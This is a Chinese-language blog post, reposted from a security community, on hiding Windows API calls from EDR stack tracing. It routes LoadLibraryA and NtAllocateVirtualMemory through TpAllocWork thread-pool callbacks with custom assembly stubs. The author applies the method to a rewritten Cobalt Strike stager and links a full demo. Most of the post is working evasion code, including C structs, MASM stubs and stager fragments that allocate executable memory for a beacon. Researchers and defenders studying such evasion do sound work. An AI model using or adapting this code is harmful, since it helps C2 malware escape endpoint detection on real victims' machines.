转载自先知社区:https://xz.aliyun.com/t/12273#toc-0
作者:1833646451208405
最近学习了下 BRC4 作者1月发表的博客 Hiding In PlainSight - Indirect Syscall is Dead! Long Live Custom Call Stacks (以下称原文章),原文章讲述了利用回调函数和通过少量汇编代码修改堆栈来绕过 EDR 的一些技巧,刚好前几天尝试重写了 CS 的 shellcode,今天打算用这篇文章里提到的一些技术来改造下之前写的 shellcode,算是之前 CS 4.7 Stager 逆向及 Shellcode 重写 - 先知社区 的一个续篇。
一些 EDR 通过用户态 hook 或 ETW 对敏感 API 的调用进行堆栈追踪,通过回溯堆栈中的返回地址以捕获 Shellcode:
|-----------Top Of The Stack-----------|
| |
| |
|--------------------------------------|
|------Stack Frame of LoadLibrary------|
| Return address of RX on disk |
| |
|----------Stack Frame of RX-----------| <- Detection (An unbacked RX region should never call LoadLibraryA)
| Return address of PE on disk |
| |
|-----------Stack Frame of PE----------|
| Return address of RtlUserThreadStart |
| |
|---------Bottom Of The Stack----------|
回调函数就是一个通过函数指针调用的函数。如果你把函数的指针(地址)作为参数传递给另一个函数,当这个指针被用来调用其所指向的函数时,我们就说这是回调函数。回调函数不是由该函数的实现方直接调用,而是在特定的事件或条件发生时由另外的一方调用的,用于对该事件或条件进行响应。
作者在原文章中以 TpAllocWork 函数为例,该函数的结构如下:
NTSTATUS NTAPI TpAllocWork(
PTP_WORK* ptpWrk,
PTP_WORK_CALLBACK pfnwkCallback,
PVOID OptionalArg,
PTP_CALLBACK_ENVIRON CallbackEnvironment
);
其中的第二个参数即是一个函数指针,假如我们将该参数替换成指向 LoadLibraryA 函数的指针,那么函数 LoadLibraryA 就会作为一个回调函数传递给 TpAllocWork,而后通过调用 TpPostWork 来创建一个新的线程执行 TpAllocWork 中的保存的回调函数,此时,LoadLibraryA 函数的返回地址会指向 TpPostWork 函数。理想的函数返回情况如下:
LoadLibraryA -> TpPostWork -> RtlUserThreadStart
第三个参数是回调函数的参数,在原文章中是 wininet.dll,我们需要将 wininet.dll 作为参数传递给我们的 LoadLibraryA 函数。但是,TpAllocWork 函数的第二个参数类型 PTP_WORK_CALLBACK 具有如下结构:
VOID CALLBACK WorkCallback(
PTP_CALLBACK_INSTANCE Instance,
PVOID Context,
PTP_WORK Work
);
这会导致参数无法正确地传递给 LoadLibraryA,如下,wininet.dll 被赋值给了 RDX 寄存器,在x64架构中,RDX 被用作函数传参时的第二个参数,然而,LoadLibraryA 函数并没有第二个参数!
在上一节中我们提到,使用 TpAllocWork 函数无法正确地将参数 wininet.dll 传递给 LoadLibraryA 函数,原作者在此处使用的技巧是通过汇编代码将保存在 RDX 寄存器中的参数传递给 RCX 寄存器,之后通过调用 getLoadLibraryA 函数取得 LoadLibraryA 函数的地址保存在 RAX 寄存器中并跳转执行:
section .text
extern getLoadLibraryA
global WorkCallback
WorkCallback:
mov rcx, rdx
xor rdx, rdx
call getLoadLibraryA
jmp rax
因为 RCX 寄存器在x64架构中被用来作为函数的第一个参数来传递,而调用函数 getLoadLibraryA 的返回值将保存在 RAX 寄存器中,此时,RAX 寄存器中保存的即是 LoadLibraryA 函数的地址,通过 jmp 跳转执行,即可正确地将参数 wininet.dll 传递给 LoadLibraryA 函数,getLoadLibraryA 函数如下:
UINT_PTR getLoadLibraryA() {
return (UINT_PTR)pLoadLibraryA;
}
修改后的堆栈调用:
作者给出的示例代码如下:
#include <windows.h>
#include <stdio.h>
typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);
FARPROC pLoadLibraryA;
UINT_PTR getLoadLibraryA() {
return (UINT_PTR)pLoadLibraryA;
}
extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
int main() {
pLoadLibraryA = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
CHAR *libName = "wininet.dll";
PTP_WORK WorkReturn = NULL;
((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, libName, NULL);
((TPPOSTWORK)pTpPostWork)(WorkReturn);
((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
WaitForSingleObject((HANDLE)-1, 0x1000);
printf("hWininet: %p\n", GetModuleHandleA(libName));
return 0;
}
此处作者定义了一个全局变量 pLoadLibraryA 用于调用函数 getLoadLibraryA 时取得 LoadLibraryA 的函数地址,但是因为我们要写的是一段 shellcode,不能使用全局变量,所以我对此处的 getLoadLibraryA 函数进行了适当的修改,将 pLoadLibrary定义为局部变量并通过函数 GetProcAddressWithHash 获取其地址:
EXTERN_C UINT_PTR getLoadLibraryA() {
FARPROC pLoadLibraryA = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C);
return (UINT_PTR)pLoadLibraryA;
}
而这又引入了新的问题,在调用 GetProcAddressWithHash 函数后,用于传递参数的几个寄存器的值均发生了变化,这会再次导致参数 wininet.dll 无法正确地传递给 LoadLibraryA 函数,我在此处采用的方法是将 xmm 寄存器作为临时传递参数的寄存器,修改后的汇编代码如下:
myLoadLibrary PROC
movq xmm3, rdx
xor rdx, rdx
call getLoadLibraryA
movq rcx, xmm3
xorps xmm3, xmm3
jmp rax
myLoadLibrary ENDP
除了对动态链接库的加载进行监测外,一些敏感 API 函数也受到 EDR 的监视,原文章以 NtAllocateVirtualMemory 为例。
首先创建一个结构体用来保存 NtAllocateVirtualMemory 和它的参数:
typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
HANDLE hProcess; // HANDLE ProcessHandle - rcx
PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer
ULONG permissions; // ULONG Protect - PAGE_EXECUTE_READ - 0x20 - stack pointer
} NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;
之后,我们初始化这个结构体,将它作为指针传递给 TpAllocWork 函数调用我们的回调函数:
#include <windows.h>
#include <stdio.h>
typedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID OptionalArg, PTP_CALLBACK_ENVIRON CallbackEnvironment);
typedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);
typedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);
typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS {
UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax
HANDLE hProcess; // HANDLE ProcessHandle - rcx
PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8
PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer
ULONG permissions; // ULONG Protect - PAGE_EXECUTE_READ - 0x20 - stack pointer
} NTALLOCATEVIRTUALMEMORY_ARGS, *PNTALLOCATEVIRTUALMEMORY_ARGS;
extern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
int main() {
LPVOID allocatedAddress = NULL;
SIZE_T allocatedsize = 0x1000;
NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryArgs = { 0 };
ntAllocateVirtualMemoryArgs.pNtAllocateVirtualMemory = (UINT_PTR) GetProcAddress(GetModuleHandleA("ntdll"), "NtAllocateVirtualMemory");
ntAllocateVirtualMemoryArgs.hProcess = (HANDLE)-1;
ntAllocateVirtualMemoryArgs.address = &allocatedAddress;
ntAllocateVirtualMemoryArgs.size = &allocatedsize;
ntAllocateVirtualMemoryArgs.permissions = PAGE_EXECUTE_READ;
FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpAllocWork");
FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpPostWork");
FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA("ntdll"), "TpReleaseWork");
PTP_WORK WorkReturn = NULL;
((TPALLOCWORK)pTpAllocWork)(&WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, &ntAllocateVirtualMemoryArgs, NULL);
((TPPOSTWORK)pTpPostWork)(WorkReturn);
((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);
WaitForSingleObject((HANDLE)-1, 0x1000);
printf("allocatedAddress: %p\n", allocatedAddress);
getchar();
return 0;
}
在之前处理 LoadLibraryA 函数时,为了能够构造 PTP_WORK_CALLBACK 类型的函数结构并将正确的参数传递给 LoadLibraryA 函数,我们编写了一些汇编代码将 RDX 寄存器中的存储的参数转移到了 RCX 寄存器中,而此处的 NtAllocateVirtualMemory 函数有6个参数,这些参数在传递时不仅使用了寄存器,还需要使用堆栈进行传参。我们的 WorkCallback 本质上是通过另一个函数 TppWorkpExecuteCallback 进行调用的,此时的堆栈顶部会保存该函数的返回地址:
如果我们此时修改堆栈顶部的内容,将 NtAllocateVirtualMemory 函数的参数分配新的空间到栈中,会破坏这个堆栈结构,从而导致 WorkCallback 函数无法正常返回,所以我们不能改变现有的堆栈结构,同时又将 NtAllocateVirtualMemory 参数的值保存到这个堆栈结构中,恰好当前 TppWorkpExecuteCallback 函数的堆栈结构有足够的空间容纳 NtAllocateVirtualMemory 函数的参数,作者给出的汇编代码:
section .text
global WorkCallback
WorkCallback:
mov rbx, rdx ; backing up the struct as we are going to stomp rdx
mov rax, [rbx] ; NtAllocateVirtualMemory
mov rcx, [rbx + 0x8] ; HANDLE ProcessHandle
mov rdx, [rbx + 0x10] ; PVOID *BaseAddress
xor r8, r8 ; ULONG_PTR ZeroBits
mov r9, [rbx + 0x18] ; PSIZE_T RegionSize
mov r10, [rbx + 0x20] ; ULONG Protect
mov [rsp+0x30], r10 ; stack pointer for 6th arg
mov r10, 0x3000 ; ULONG AllocationType
mov [rsp+0x28], r10 ; stack pointer for 5th arg
jmp rax
调用 NtAllocateVirtualMemory 时寄存器和堆栈情况:
此时 NtAllocateVirtualMemory 在堆栈调用关系上与我们的 shellcode 区域没有明显的关联:
Shellcode 的编写方法我在 CS 4.7 Stager 逆向及 Shellcode 重写 - 先知社区 已经做了介绍,这里不再赘述。
替换 LoadLibraryA 进行模块加载:
/* Load User32.dll */
ai.pfnTpAllocWork(&LoadUser32, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szUser32, NULL);
ai.pfnTpPostWork(LoadUser32);
ai.pfnTpReleaseWork(LoadUser32);
/* Load Wininet.dll */
ai.pfnTpAllocWork(&LoadWininet, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szWininet, NULL);
ai.pfnTpPostWork(LoadWininet);
ai.pfnTpReleaseWork(LoadWininet);
替换 VirtualAlloc 分配内存空间:
/* Allocate Memory For URL */
ntAllocateVirtualMemoryUrlArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
ntAllocateVirtualMemoryUrlArgs.hProcess = (HANDLE)-1;
ntAllocateVirtualMemoryUrlArgs.address = &httpurl;
ntAllocateVirtualMemoryUrlArgs.size = &allocatedurlsize;
ntAllocateVirtualMemoryUrlArgs.permissions = PAGE_READWRITE;
ai.pfnTpAllocWork(&AllocUrl, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryUrlArgs, NULL);
ai.pfnTpPostWork(AllocUrl);
ai.pfnTpReleaseWork(AllocUrl);
/* Allocate Memory For Beacon */
ntAllocateVirtualMemoryBeaconArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D);
ntAllocateVirtualMemoryBeaconArgs.hProcess = (HANDLE)-1;
ntAllocateVirtualMemoryBeaconArgs.address = &beacon;
ntAllocateVirtualMemoryBeaconArgs.size = &allocatedbeaconsize;
ntAllocateVirtualMemoryBeaconArgs.permissions = PAGE_EXECUTE_READWRITE;
ai.pfnTpAllocWork(&AllocBeacon, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryBeaconArgs, NULL);
ai.pfnTpPostWork(AllocBeacon);
ai.pfnTpReleaseWork(AllocBeacon);
回调函数的汇编代码:
EXTRN getLoadLibraryA: PROC
PUBLIC myLoadLibrary
PUBLIC myNtAllocateVirtualMemory
_TEXT SEGMENT
myLoadLibrary PROC
movq xmm3, rdx
xor rdx, rdx
call getLoadLibraryA
movq rcx, xmm3
xorps xmm3, xmm3
jmp rax
myLoadLibrary ENDP
myNtAllocateVirtualMemory PROC
mov rbx, rdx ; backing up the struct as we are going to stomp rdx
mov rax, [rbx] ; NtAllocateVirtualMemory
mov rcx, [rbx + 8h] ; HANDLE ProcessHandle
mov rdx, [rbx + 10h] ; PVOID *BaseAddress
xor r8, r8 ; ULONG_PTR ZeroBits
mov r9, [rbx + 18h] ; PSIZE_T RegionSize
mov r10, [rbx + 20h] ; ULONG Protect
mov [rsp+30h], r10 ; stack pointer for 6th arg
mov r10, 3000h ; ULONG AllocationType
mov [rsp+28h], r10 ; stack pointer for 5th arg
jmp rax
myNtAllocateVirtualMemory ENDP
_TEXT ENDS
END
将汇编部分编译成 obj 文件,然后在项目属性链接器部分将其作为附加依赖项:
需要注意的是,项目属性要禁用优化或者改为优化速度,否则编译的 shellcode 无法正常运行(这里我也不清楚原因,有知道的师傅还请指教下),这也导致提取出来的 shellcode 比之前的大了一倍多:
提取 shellcode,使用一个简单的加载器测试上线:
完整 demo(写的比较粗糙):https://github.com/ReLay280h/myStager
Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI Stack Tracing
Hiding In PlainSight - Indirect Syscall is Dead! Long Live Custom Call Stacks
WorkCallback callback function (Windows))